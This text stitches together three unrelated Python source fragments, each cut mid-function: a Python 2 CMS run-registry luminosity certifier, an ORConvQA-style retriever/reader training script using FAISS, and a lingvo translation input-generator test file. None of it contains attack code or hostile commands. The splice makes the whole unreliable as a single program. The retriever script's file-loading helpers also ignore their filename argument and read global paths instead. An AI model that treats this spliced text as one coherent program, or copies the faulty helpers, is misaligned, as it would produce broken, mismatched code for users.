if self.useDAS == "True":
self.usedbs = False
print "Using DAS database: ", self.useDAS
print "Using Cache? : ", self.useDBScache
self.online = False
if "TRUE" == self.online_cfg.upper() or \
"1" == self.online_cfg.upper() or \
"YES" == self.online_cfg.upper():
self.online = True
try:
self.bfield_min = float(self.bfield_min)
except:
print "Minimum BFIELD value not understood: ", self.bfield_min
sys.exit(1)
try:
self.bfield_max = float(self.bfield_max)
except:
print "Maximum BFIELD value not understood: ", self.bfield_max
sys.exit(1)
try:
self.bfield_thr = float(self.bfield_thr)
except:
print "Threshold BFIELD value not understood: ", self.bfield_thr
sys.exit(1)
if self.bfield_thr > self.bfield_min:
self.bfield_min = self.bfield_thr
for e in range(0, len(self.beamene)):
try:
self.beamene[e] = float(self.beamene[e])
if self.verbose:
print "Beam Energy ", self.beamene
except:
print "BEAMENE value not understood: ", self.beamene
sys.exit(1)
def generateFilter(self):
self.filter = {}
self.filter.setdefault("dataset", {})\
.setdefault("rowClass", "org.cern.cms.dqm.runregistry.user.model.RunDatasetRowGlobal")
for qf in self.qflist:
(sys,value) = qf.split(':')
if self.verbose: print qf
if sys != "NONE":
# Check if the bit is not excluded to avoide filter on LS for Egamma, Muon, JetMET
if len([i for i in self.EXCL_LS_BITS if i == sys.lower()]) == 0:
self.filter.setdefault(sys.lower()+"Status", self.qry[value])
# Check run flag
if (self.EXCL_RUN_BITS != sys.lower()):
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault(sys.lower(), {})\
.setdefault("status", " = %s" % value)
if self.nolowpu == "True":
print "Removing low pile-up runs"
self.filter.setdefault("lowLumiStatus", "isNull OR = false")
else:
print "Selecting ONLY low pile-up runs"
self.filter.setdefault("lowLumiStatus", "true")
for dcs in self.dcslist:
if dcs != "NONE":
self.filter.setdefault(dcs.lower()+"Ready", "isNull OR = true")
# self.filter.setdefault(dcs.lower(), "isNull OR = true")
if self.verbose: print dcs
if self.useBeamPresent == "True":
print "Removing LS with no beam present"
self.filter.setdefault("beam1Present", "isNull OR = true")
self.filter.setdefault("beam2Present", "isNull OR = true")
if self.useBeamStable == "True":
print "Removing LS with non-stable beams"
self.filter.setdefault("beam1Stable", "isNull OR = true")
self.filter.setdefault("beam2Stable", "isNull OR = true")
if self.online:
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("datasetName", "like %s" % Certifier.OnlineRX)
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("online", " = true")
else:
datasetQuery = ''
for i in self.dataset.split():
datasetQuery += ' like "%s" OR' % i.split(":")[0]
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("datasetName", " like %s" % datasetQuery)
self.filter.setdefault("runNumber", ">= %d AND <= %d " %(int(self.runmin), int(self.runmax)))
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("runClassName", self.group)
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("rowClass", "org.cern.cms.dqm.runregistry.user.model.RunSummaryRowGlobal")
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("filter",{})\
.setdefault("bfield", "> %.1f AND < %.1f " % (self.bfield_min, self.bfield_max) )
if self.group.startswith("Collisions"):
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("filter", {})\
.setdefault("injectionScheme", " like %s " % self.injection )
self.filter.setdefault("cmsActive", "isNull OR = true")
for comp in self.component:
if comp != 'NONE':
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("filter",{})\
.setdefault(comp.lower()+"Present", " = true")
if len(self.dsstate):
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("datasetState", " = %s" % self.dsstate)
if len(self.beamene):
eneQuery = '{lhcEnergy} IS NULL OR {lhcEnergy} = 0 '
for e in self.beamene:
energyLow = e - 400
if energyLow < 0:
energyLow = 0
energyHigh = e + 400
eneQuery += 'OR ( {lhcEnergy} >= %.1d AND {lhcEnergy} <= %.1d) ' % (energyLow, energyHigh)
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("query", eneQuery)
if self.verbose:
print json.dumps(self.filter)
def generateJson(self):
try:
self.api = RRApi(self.address, debug = self.verbose)
except RRApiError, e:
print e
sys.exit(1)
self.cert_json = self.api.data(workspace = 'GLOBAL'\
, table = 'datasetlumis'\
, template = 'json'\
, columns = ['runNumber', 'sectionFrom', 'sectionTo']\
, tag = 'LATEST'\
, filter = self.filter)
if self.verbose:
print "Printing JSON file ", json.dumps(self.cert_json)
self.convertToOldJson()
dbsjson={}
if self.useDBScache == "True":
dbsjson=get_cachejson(self, self.dbs_pds_all)
elif self.usedbs:
dbsjson=get_dbsjson(self, self.dbs_pds_all, self.runmin, self.runmax, self.runlist)
elif self.useDAS:
dbsjson=get_dasjson(self, self.dbs_pds_all, self.runmin, self.runmax, self.runlist)
else:
# special case, e.g. cosmics which do not need DB or cache file
print "\nINFO: no cache or DB option was selected in cfg file"
if self.useDBScache == "True" or \
self.usedbs or \
self.useDAS:
if len(dbsjson)==0:
print "\nERROR, dbsjson contains no runs, please check!"
sys.exit(1)
if self.verbose:
print "Printing dbsjson ", dbsjson
for element in self.cert_old_json:
combined=[]
dbsbad_int=invert_intervals(self.cert_old_json[element])
if self.verbose:
print " debug: Good Lumi ", self.cert_old_json[element]
print " debug: Bad Lumi ", dbsbad_int
for interval in dbsbad_int:
combined.append(interval)
if element in dbsjson.keys():
if self.verbose:
print " debug: Found in DBS, Run ", element, ", Lumi ", dbsjson[element]
dbsbad_int=invert_intervals(dbsjson[element])
if self.verbose:
print " debug DBS: Bad Lumi ", dbsbad_int
else:
dbsbad_int=[[1,9999]]
for interval in dbsbad_int:
combined.append(interval)
combined=merge_intervals(combined)
combined=invert_intervals(combined)
if len(combined)!=0:
self.cert_old_json[element]=combined
if self.verbose:
print json.dumps(self.cert_old_json)
def convertToOldJson(self):
old_json = {}
self.cert_old_json = {}
for block in self.cert_json:
if len(block) == 3:
runNum = block['runNumber']
lumiStart = block['sectionFrom']
lumiEnd = block['sectionTo']
if self.verbose:
print " debug: Run ", runNum, " Lumi ", lumiStart, ", ", lumiEnd
# impose the selection of runs from the run list if given in cfg file
# (in a list of run accessed from RR) same later applied to list accessed from DAS
if len(self.runlist)>0:
foundr = False
for runinl in self.runlist:
if runinl.startswith('"'):
runinl = runinl[1:]
if runinl.endswith('"'):
runinl = runinl[:-1]
if int(runNum) == int(runinl):
foundr = True
# print "selecting run fom the list = ", runNum, runinl
if foundr:
old_json.setdefault(str(runNum), []).append([lumiStart, lumiEnd])
if self.verbose:
print old_json[str(runNum)]
else:
old_json.setdefault(str(runNum), []).append([lumiStart, lumiEnd])
if self.verbose:
print old_json[str(runNum)]
for block in old_json:
temp = []
temp = merge_intervals2(old_json[block])
self.cert_old_json.setdefault(block, temp)
if self.verbose:
print "Merging Done on Run ", block,
print " Interval ", temp
def writeJson(self):
js = open(self.jsonfile, 'w+')
json.dump(self.cert_old_json, js, sort_keys=True)
js.close()
# print json file name
print " "
print "-------------------------------------------"
print "Json file: %s written.\n" % self.jsonfile
def invert_intervals(intervals,min_val=1,max_val=9999):
if not intervals:
return []
intervals=merge_intervals(intervals)
intervals = sorted(intervals, key = lambda x: x[0])
result = []
if min_val==-1:
(a,b)=intervals[0]
min_val=a
if max_val==-1:
(a,b)=intervals[len(intervals)-1]
max_val=b
curr_min=min_val
for (x,y) in intervals:
if x>curr_min:
result.append((curr_min,x-1))
curr_min=y+1
if curr_min<max_val:
| |
start_logits=to_list(outputs[0][i]),
end_logits=to_list(outputs[1][i]),
retrieval_logits=to_list(outputs[2][i]),
retriever_prob=retriever_probs[i])
all_results.append(result)
evalTime = timeit.default_timer() - start_time
logger.info(" Evaluation done in total %f secs (%f sec per example)",
evalTime, evalTime / len(dataset))
output_prediction_file = os.path.join(
predict_dir, "instance_predictions_{}.json".format(prefix))
output_nbest_file = os.path.join(
predict_dir, "instance_nbest_predictions_{}.json".format(prefix))
output_final_prediction_file = os.path.join(
predict_dir, "final_predictions_{}.json".format(prefix))
if args.version_2_with_negative:
output_null_log_odds_file = os.path.join(
predict_dir, "instance_null_odds_{}.json".format(prefix))
else:
output_null_log_odds_file = None
all_predictions = write_predictions(examples, features, all_results, args.n_best_size,
args.max_answer_length, args.do_lower_case, output_prediction_file,
output_nbest_file, output_null_log_odds_file, args.verbose_logging,
args.version_2_with_negative, args.null_score_diff_threshold)
write_final_predictions(all_predictions, output_final_prediction_file,
use_rerank_prob=args.use_rerank_prob,
use_retriever_prob=args.use_retriever_prob)
eval_metrics = quac_eval(
orig_eval_file, output_final_prediction_file)
rerank_metrics = get_retrieval_metrics(
pytrec_eval_evaluator, all_predictions, eval_retriever_probs=True)
eval_metrics.update(rerank_metrics)
metrics_file = os.path.join(
predict_dir, "metrics_{}.json".format(prefix))
with open(metrics_file, 'w') as fout:
json.dump(eval_metrics, fout)
return eval_metrics
# In[6]:
def gen_query_reps(args, model, batch):
model.eval()
batch = {k: v.to(args.device) for k, v in batch.items()
if k not in ['example_id', 'qid', 'question_text', 'answer_text', 'answer_start']}
with torch.no_grad():
inputs = {}
inputs['query_input_ids'] = batch['query_input_ids']
inputs['query_attention_mask'] = batch['query_attention_mask']
inputs['query_token_type_ids'] = batch['query_token_type_ids']
outputs = model.retriever(**inputs)
query_reps = outputs[0]
return query_reps
# In[7]:
def retrieve(args, qids, qid_to_idx, query_reps,
passage_ids, passage_id_to_idx, passage_reps,
qrels, qrels_sparse_matrix,
gpu_index, include_positive_passage=False):
query_reps = query_reps.detach().cpu().numpy()
D, I = gpu_index.search(query_reps, args.top_k_for_retriever)
pidx_for_retriever = np.copy(I)
qidx = [qid_to_idx[qid] for qid in qids]
qidx_expanded = np.expand_dims(qidx, axis=1)
qidx_expanded = np.repeat(qidx_expanded, args.top_k_for_retriever, axis=1)
labels_for_retriever = qrels_sparse_matrix[qidx_expanded, pidx_for_retriever].toarray()
# print('labels_for_retriever before', labels_for_retriever)
if include_positive_passage:
for i, (qid, labels_per_query) in enumerate(zip(qids, labels_for_retriever)):
has_positive = np.sum(labels_per_query)
if not has_positive:
positive_pid = list(qrels[qid].keys())[0]
positive_pidx = passage_id_to_idx[positive_pid]
pidx_for_retriever[i][-1] = positive_pidx
labels_for_retriever = qrels_sparse_matrix[qidx_expanded, pidx_for_retriever].toarray()
# print('labels_for_retriever after', labels_for_retriever)
assert np.sum(labels_for_retriever) >= len(labels_for_retriever)
pids_for_retriever = passage_ids[pidx_for_retriever]
passage_reps_for_retriever = passage_reps[pidx_for_retriever]
scores = D[:, :args.top_k_for_reader]
retriever_probs = sp.special.softmax(scores, axis=1)
pidx_for_reader = I[:, :args.top_k_for_reader]
# print('pidx_for_reader', pidx_for_reader)
# print('qids', qids)
# print('qidx', qidx)
qidx_expanded = np.expand_dims(qidx, axis=1)
qidx_expanded = np.repeat(qidx_expanded, args.top_k_for_reader, axis=1)
# print('qidx_expanded', qidx_expanded)
labels_for_reader = qrels_sparse_matrix[qidx_expanded, pidx_for_reader].toarray()
# print('labels_for_reader before', labels_for_reader)
# print('labels_for_reader before', labels_for_reader)
if include_positive_passage:
for i, (qid, labels_per_query) in enumerate(zip(qids, labels_for_reader)):
has_positive = np.sum(labels_per_query)
if not has_positive:
positive_pid = list(qrels[qid].keys())[0]
positive_pidx = passage_id_to_idx[positive_pid]
pidx_for_reader[i][-1] = positive_pidx
labels_for_reader = qrels_sparse_matrix[qidx_expanded, pidx_for_reader].toarray()
# print('labels_for_reader after', labels_for_reader)
assert np.sum(labels_for_reader) >= len(labels_for_reader)
# print('labels_for_reader after', labels_for_reader)
pids_for_reader = passage_ids[pidx_for_reader]
# print('pids_for_reader', pids_for_reader)
passages_for_reader = get_passages(pidx_for_reader, args)
# we do not need to modify scores and probs matrices because they will only be
# needed at evaluation, where include_positive_passage will be false
return {'qidx': qidx,
'pidx_for_retriever': pidx_for_retriever,
'pids_for_retriever': pids_for_retriever,
'passage_reps_for_retriever': passage_reps_for_retriever,
'labels_for_retriever': labels_for_retriever,
'retriever_probs': retriever_probs,
'pidx_for_reader': pidx_for_reader,
'pids_for_reader': pids_for_reader,
'passages_for_reader': passages_for_reader,
'labels_for_reader': labels_for_reader}
# In[8]:
def get_passage(i, args):
line = linecache.getline(args.blocks_path, i + 1)
line = json.loads(line.strip())
return line['text']
get_passages = np.vectorize(get_passage)
def load_pickle(fname, logger):
logger.info(f'loading pickle file: {fname}')
if not os.path.isfile(fname):
logger.error(f'Failed to open {fname}, file not found')
# Fix reading large pickle files on MAC systems
if platform.system() == "Darwin":
bytes_in = bytearray(0)
max_bytes = 2 ** 31 - 1
input_size = os.path.getsize(args.passage_ids_path)
with open(args.passage_ids_path, 'rb') as f_in:
for _ in range(0, input_size, max_bytes):
bytes_in += f_in.read(max_bytes)
return pkl.loads(bytes_in)
with open(fname, 'rb') as handle:
return joblib.load(handle)
def load_json(fname, logger):
logger.info(f'loading json file {fname}')
if not os.path.isfile(fname):
logger.error(f'Failed to open {fname}, file not found')
with open(args.qrels) as handle:
return json.load(handle)
#TODO combine with resource manager
def construct_faiss_index(passage_reps, proj_size, no_cuda, logger):
logger.info('constructing passage faiss_index')
index = faiss.IndexFlatIP(proj_size)
index.add(passage_reps)
if torch.cuda.is_available() and not no_cuda:
faiss_res = faiss.StandardGpuResources()
if torch.cuda.device_count() > 1:
# run faiss on last gpu if more than 1 is available
gpuId = torch.cuda.device_count() - 1
index = faiss.index_cpu_to_gpu(faiss_res, gpuId, index)
else:
# otherwise use the only available one
index = faiss.index_cpu_to_gpu(faiss_res, 0, index)
return index
def create_inv_passage_id_index(passage_ids):
# TODO this seems like a slow way to do this
passage_id_to_idx = {}
for i, pid in enumerate(passage_ids):
passage_id_to_idx[pid] = i
return passage_id_to_idx
# TODO rename, also returns inverse quid index
def create_qrel_sparse_matrix(qrels, passage_id_to_idx):
# TODO no loops?
qrels_data, qrels_row_idx, qrels_col_idx = [], [], []
qid_to_idx = {}
for i, (qid, v) in enumerate(qrels.items()):
qid_to_idx[qid] = i
for pid in v.keys():
qrels_data.append(1)
qrels_row_idx.append(i)
qrels_col_idx.append(passage_id_to_idx[pid])
qrels_sparse_matrix = sp.sparse.csr_matrix(
(qrels_data, (qrels_row_idx, qrels_col_idx)))
return qrels_sparse_matrix, qid_to_idx
#####################
# CODE START
####################
logger = logging.getLogger(__name__)
ALL_MODELS = list(BertConfig.pretrained_config_archive_map.keys())
MODEL_CLASSES = {
'reader': (BertConfig, BertForOrconvqaGlobal, BertTokenizer),
'retriever': (AlbertConfig, AlbertForRetrieverOnlyPositivePassage, AlbertTokenizer),
}
argparser = StdArgparser()
args = argparser.get_parsed()
# TODO fix everything going through single output dir (better of with multiple subfiles per run unless continue flag is set)
if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train and not args.overwrite_output_dir:
raise ValueError(
"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.".format(args.output_dir))
# TODO DONT OVERWRITE ARGUMENTS
args.retriever_tokenizer_dir = os.path.join(args.output_dir, 'retriever')
args.reader_tokenizer_dir = os.path.join(args.output_dir, 'reader')
# Setup distant debugging if needed
# TODO remove? Seems outside of the scope of this project
# if args.server_ip and args.server_port:
# # Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script
# import ptvsd
# print("Waiting for debugger attach")
# ptvsd.enable_attach(
# address=(args.server_ip, args.server_port), redirect_output=True)
# ptvsd.wait_for_attach()
# Setup CUDA, GPU & distributed training
# we now only support joint training on a single card
# we will request two cards, one for torch and the other one for faiss
# TODO create general resource manager class to assign GPU space, this code seems pretty bad (P.S. look at fais index creation)
if args.local_rank == -1 or args.no_cuda:
device = torch.device(
"cuda:0" if torch.cuda.is_available() and not args.no_cuda else "cpu")
# args.n_gpu = torch.cuda.device_count()
args.n_gpu = 1
# torch.cuda.set_device(0)
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend='nccl')
args.n_gpu = 1
args.device = device
# Setup logging
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN)
logger.warning("Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
args.local_rank, device, args.n_gpu, bool(args.local_rank != -1), args.fp16)
# Set seed
set_seed(args)
# Load pretrained model and tokenizer
if args.local_rank not in [-1, 0]:
# Make sure only the first process in distributed training will download model & vocab
torch.distributed.barrier()
model = Pipeline()
args.retriever_model_type = args.retriever_model_type.lower()
retriever_config_class, retriever_model_class, retriever_tokenizer_class = MODEL_CLASSES['retriever']
retriever_config = retriever_config_class.from_pretrained(args.retrieve_checkpoint)
# load pretrained retriever
retriever_tokenizer = retriever_tokenizer_class.from_pretrained(args.retrieve_tokenizer_dir)
retriever_model = retriever_model_class.from_pretrained(args.retrieve_checkpoint, force_download=True)
model.retriever = retriever_model
# do not need and do not tune passage encoder
model.retriever.passage_encoder = None
model.retriever.passage_proj = None
args.reader_model_type = args.reader_model_type.lower()
reader_config_class, reader_model_class, reader_tokenizer_class = MODEL_CLASSES['reader']
reader_config = reader_config_class.from_pretrained(args.reader_config_name if args.reader_config_name else args.reader_model_name_or_path,
cache_dir=args.reader_cache_dir if args.reader_cache_dir else None)
reader_config.num_qa_labels = 2
# this not used for BertForOrconvqaGlobal
reader_config.num_retrieval_labels = 2
reader_config.qa_loss_factor = args.qa_loss_factor
reader_config.retrieval_loss_factor = args.retrieval_loss_factor
reader_tokenizer = reader_tokenizer_class.from_pretrained(args.reader_tokenizer_name if args.reader_tokenizer_name else args.reader_model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.reader_cache_dir if args.reader_cache_dir else None)
reader_model = reader_model_class.from_pretrained(args.reader_model_name_or_path,
from_tf=bool(
'.ckpt' in args.reader_model_name_or_path),
config=reader_config,
cache_dir=args.reader_cache_dir if args.reader_cache_dir else None)
model.reader = reader_model
if args.local_rank == 0:
# Make sure only the first process in distributed training will download model & vocab
torch.distributed.barrier()
# TODO What? assign again? Isnt GPU space already assigned?
model.to(args.device)
logger.info("Training/evaluation parameters %s", args)
# Before we do anything with models, we want to ensure that we get fp16 execution of torch.einsum if args.fp16 is set.
# Otherwise it'll default to "promote" mode, and we'll get fp32 operations. Note that running `--fp16_opt_level="O2"` will
# remove the need for this code, but it is still valid.
# TODO do we need this?
if args.fp16:
try:
import apex
apex.amp.register_half_function(torch, 'einsum')
except ImportError:
raise ImportError(
"Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
passage_ids = load_pickle(args.passage_ids_path, logger)
passage_reps = load_pickle(args.passage_reps_path, logger)
#TODO change this var name, not allways a GPU index, can also be CPU based faiss index
gpu_index = construct_faiss_index(passage_reps, args.proj_size, args.no_cuda, logger)
qrels = load_json(args.qrels, logger)
passage_id_to_idx = create_inv_passage_id_index(passage_ids)
qrels_sparse_matrix, qid_to_idx = create_qrel_sparse_matrix(qrels, passage_id_to_idx)
evaluator = pytrec_eval.RelevanceEvaluator(qrels, {'recip_rank', 'recall'})
# In[10]:
# Training
if args.do_train:
DatasetClass = RetrieverDataset
train_dataset = DatasetClass(args.train_file, retriever_tokenizer,
args.load_small, args.history_num,
query_max_seq_length=args.retriever_query_max_seq_length,
is_pretraining=args.is_pretraining,
given_query=True,
given_passage=False,
include_first_for_retriever=args.include_first_for_retriever)
global_step, tr_loss = train(
args, train_dataset, model, retriever_tokenizer, reader_tokenizer)
logger.info(" global_step = %s, average loss = %s",
global_step, tr_loss)
# Save the trained model and the tokenizer
if args.do_train and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
# Create output directory if needed
# TODO should be easy to move to own function
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
if not os.path.exists(args.retriever_tokenizer_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.retriever_tokenizer_dir)
if not os.path.exists(args.reader_tokenizer_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.reader_tokenizer_dir)
logger.info("Saving model checkpoint to %s", args.output_dir)
# Save a trained model, configuration and tokenizer using `save_pretrained()`.
# They can then be reloaded using `from_pretrained()`
# Take care of distributed/parallel training
model_to_save = model.module if hasattr(model, 'module') else model
final_checkpoint_output_dir = os.path.join(
args.output_dir, 'checkpoint-{}'.format(global_step))
# TODO fine, but maybe move to function?
final_retriever_model_dir = os.path.join(
final_checkpoint_output_dir, 'retriever')
final_reader_model_dir = os.path.join(
final_checkpoint_output_dir, 'reader')
# TODO | |
<gh_stars>0
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for input generator."""
from absl.testing import parameterized
import lingvo.compat as tf
from lingvo.core import cluster_factory
from lingvo.core import py_utils
from lingvo.core import test_helper
from lingvo.core import test_utils
from lingvo.core import tokenizers
from lingvo.tasks.mt import input_generator
import mock
import numpy as np
class InputTest(test_utils.TestCase, parameterized.TestCase):
def _CreateMlPerfInputParams(self):
p = input_generator.MlPerfInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/translate_ende_wmt32k-train-00511-of-00512')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [20, 40]
p.bucket_batch_limit = [4, 8]
return p
def _CreateMlPerfPackedInputParams(self):
p = input_generator.MlPerfInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/translate_ende_mlperf.packed.tfrecord')
p.file_pattern = 'tfrecord:' + input_file
p.packed_input = True
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [20, 240]
p.bucket_batch_limit = [4, 4]
return p
def _CreateNmtInputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [20, 40]
p.bucket_batch_limit = [4, 8]
return p
def testBasic(self):
p = self._CreateNmtInputParams()
with self.session(use_gpu=False):
inp = input_generator.NmtInput(p)
# Runs a few steps.
for _ in range(10):
self.evaluate(inp.GetPreprocessedInputBatch())
def testMlPerfPackedInput(self):
p = self._CreateMlPerfPackedInputParams()
with self.session(use_gpu=False):
inp = input_generator.MlPerfInput(p)
for _ in range(1):
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
tf.logging.info(fetched.src.ids.shape)
tf.logging.info(fetched.src.segment_ids.shape)
tf.logging.info(fetched.src.segment_pos.shape)
tf.logging.info(fetched.tgt.segment_ids.shape)
tf.logging.info(fetched.tgt.segment_pos.shape)
def checkPadShape(self, x, pad, batch_size, actual_max, pad_length):
# Check the shape: (batch, maxlen)
self.assertEqual(x.shape, (batch_size, pad_length))
# Check the padding.
self.assertAllEqual(x[:, actual_max:],
np.full((batch_size, (pad_length - actual_max)), pad))
def testMlPerfPackedInputPadToMax(self):
p = self._CreateMlPerfPackedInputParams()
p.source_max_length = 300
p.target_max_length = 300
p.pad_to_max_seq_length = True
with self.session(use_gpu=False):
inp = input_generator.MlPerfInput(p)
for _ in range(1):
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
self.checkPadShape(
fetched.src.ids, pad=0, batch_size=4, actual_max=240, pad_length=300)
self.checkPadShape(
fetched.tgt.ids, pad=0, batch_size=4, actual_max=240, pad_length=300)
self.checkPadShape(
fetched.tgt.segment_ids,
pad=0,
batch_size=4,
actual_max=240,
pad_length=300)
self.checkPadShape(
fetched.tgt.segment_pos,
pad=0,
batch_size=4,
actual_max=240,
pad_length=300)
def testMlPerf(self):
p = self._CreateMlPerfInputParams()
with self.session(use_gpu=False):
inp = input_generator.MlPerfInput(p)
# Runs a few steps.
for _ in range(10):
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
tf.logging.info(fetched)
def testMlPerfPadToMax(self):
p = self._CreateMlPerfInputParams()
p.bucket_upper_bound = [20]
p.bucket_batch_limit = [4]
p.source_max_length = 30
p.target_max_length = 30
p.pad_to_max_seq_length = True
with self.session(use_gpu=False):
inp = input_generator.MlPerfInput(p)
# Runs a few steps.
for _ in range(10):
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
def Check(x, pad):
# Check the shape: (batch, maxlen)
self.assertEqual(x.shape, (4, 30))
# Check the padding.
self.assertAllEqual(x[:, 20:], np.full((4, 10), pad))
Check(fetched.src.ids, 0)
Check(fetched.src.paddings, 1)
Check(fetched.tgt.ids, 0)
Check(fetched.tgt.labels, 0)
Check(fetched.tgt.weights, 0)
Check(fetched.tgt.paddings, 1)
def testPadToMax(self):
p = self._CreateNmtInputParams()
p.bucket_upper_bound = [20]
p.bucket_batch_limit = [4]
p.source_max_length = 30
p.target_max_length = 30
p.pad_to_max_seq_length = True
with self.session(use_gpu=False):
inp = input_generator.NmtInput(p)
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
def Check(x, pad):
# Check the shape: (batch, maxlen)
self.assertEqual(x.shape, (4, 30))
# Check the padding.
self.assertAllEqual(x[:, 20:], np.full((4, 10), pad))
Check(fetched.src.ids, 0)
Check(fetched.src.paddings, 1)
Check(fetched.tgt.ids, 0)
Check(fetched.tgt.labels, 0)
Check(fetched.tgt.weights, 0)
Check(fetched.tgt.paddings, 1)
def testSplitSources(self):
p = self._CreateNmtInputParams()
num_splits = 2
expected_ids_split_1 = [
[
93, 15027, 643, 8, 2985, 3, 27025, 6, 4569, 2, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0
],
[
15027, 1668, 4125, 54, 139, 24, 3, 101, 8, 2031, 5545, 2962, 5, 2,
0, 0, 0, 0, 0, 0
],
]
expected_ids_split_2 = [
[
626, 854, 11, 392, 45, 77, 67, 1346, 30, 25, 10, 2283, 933, 14,
22255, 425, 872, 4677, 5, 2
],
[
52, 21, 1034, 4, 3, 274, 30, 7203, 6275, 3, 967, 795, 142, 5, 2, 0,
0, 0, 0, 0
],
]
with self.session(use_gpu=False):
inp = input_generator.NmtInput(p)
splits = inp.SplitInputBatch(num_splits)
split_ids = self.evaluate([splits[0].src.ids, splits[1].src.ids])
tf.logging.info('split_ids[0] = %r', split_ids[0])
tf.logging.info('split_ids[1] = %r', split_ids[1])
self.assertAllEqual(expected_ids_split_1, split_ids[0])
self.assertAllEqual(expected_ids_split_2, split_ids[1])
def testSplitTargets(self):
p = self._CreateNmtInputParams()
num_splits = 2
with self.session(use_gpu=False):
inp = input_generator.NmtInput(p)
fetched = self.evaluate(inp.SplitInputBatch(num_splits))
expected_ids_split_1 = [
[
1, 272, 7514, 10944, 2220, 815, 3, 39, 6, 3021, 4893, 10, 6693,
23788, 3410, 0, 0, 0, 0
],
[
1, 28, 18764, 6, 1413, 2338, 8068, 107, 431, 14, 6, 1083, 3, 11,
782, 19664, 9, 3622, 4
],
]
expected_ids_split_2 = [
[
1, 15149, 12, 583, 43, 61, 179, 1265, 22, 27, 7193, 16, 5, 782,
14077, 6734, 4, 0, 0
],
[
1, 81, 90, 1397, 9207, 61, 241, 2102, 15, 3003, 424, 6, 483, 4, 0,
0, 0, 0, 0
],
]
tf.logging.info('fetched[0].tgt.ids = %r', fetched[0].tgt.ids)
tf.logging.info('fetched[1].tgt.ids = %r', fetched[1].tgt.ids)
self.assertAllEqual(expected_ids_split_1, fetched[0].tgt.ids)
self.assertAllEqual(expected_ids_split_2, fetched[1].tgt.ids)
def testTextPackedInputProto(self):
p = input_generator.TextPackedInput.Params()
p.flush_every_n = 0
p.repeat_count = 1
p.file_pattern = 'tfrecord:' + test_helper.test_src_dir_path(
'tasks/mt/testdata/en_fr.tfrecord')
p.pad_to_max_seq_length = True
p.tokenizer = tokenizers.AsciiTokenizer.Params()
p.input_file_type = 'sentence_proto'
p.source_max_length = 22
p.target_max_length = 24
p.bucket_batch_limit = [2]
with self.session() as sess:
inp = p.Instantiate()
batch_tensor = inp.GetPreprocessedInputBatch()
for k, x in batch_tensor.FlattenItems():
self.assertTrue(x.shape.is_fully_defined(), k)
batch = sess.run(batch_tensor)
self.assertLen(batch.src, 8)
self.assertAllEqual(batch.src.strs,
[b'I love paragliding!', b'vol biv paragliding'])
self.assertAllEqual(batch.tgt.strs,
[b"J'adore le parapente!", b'vol biv parapente'])
self.assertAllEqual(
batch.src.ids,
np.array([
[
13, 3, 16, 19, 26, 9, 3, 20, 5, 22, 5, 11, 16, 13, 8, 13, 18,
11, 35, 2, 0, 0
],
[
26, 19, 16, 3, 6, 13, 26, 3, 20, 5, 22, 5, 11, 16, 13, 8, 13,
18, 11, 2, 0, 0
],
]))
self.assertAllEqual(
batch.tgt.ids,
np.array([
[
1, 14, 32, 5, 8, 19, 22, 9, 3, 16, 9, 3, 20, 5, 22, 5, 20, 9,
18, 24, 9, 35, 0, 0
],
[
